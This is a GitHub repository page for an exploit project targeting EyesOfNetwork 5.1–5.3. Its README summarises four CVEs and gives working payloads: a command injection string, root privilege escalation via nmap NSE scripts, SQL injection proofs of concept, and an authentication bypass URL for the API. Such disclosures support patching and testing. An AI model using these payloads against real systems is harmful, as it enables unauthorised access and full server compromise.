Skip to content

h4knet/eonrce

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
eonrce.py
eonrce.py
 
 
eonrce2.py
eonrce2.py
 
 
eonrce51.gif
eonrce51.gif
 
 
eonrce53.gif
eonrce53.gif
 
 

Repository files navigation

eonrce

EyesOfNetwork 5.1 to 5.3 exploits

Theses two exploit files uses the following CVE's:

CVE_number__ Description
CVE-2020-8654 Discovery module to allows to run arbitrary OS commands
We were able to run the id command with the following payload in the target field : ;id #.
CVE-2020-8655 LPE via nmap NSE script
As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
nmap version 6.40 is used and doesn't have the -c and -e options.
CVE-2020-8656 SQLi in API in getApiKey function on 'username' field
PoC: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '
Auth bypass: /eonapi/getApiKey?&username=' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '&password=h4knet#
CVE-2020-9465 SQLi in API in Cookies user_id field
PoC: Cookie: user_id=1' union select sleep(3) -- ;

eonrce.py

screenshot

eonrce2.py

screenshot

About

EyesOfNetwork 5.1 to 5.3 exploits

Resources

Readme

License

GPL-3.0 license
Activity

Stars

12 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages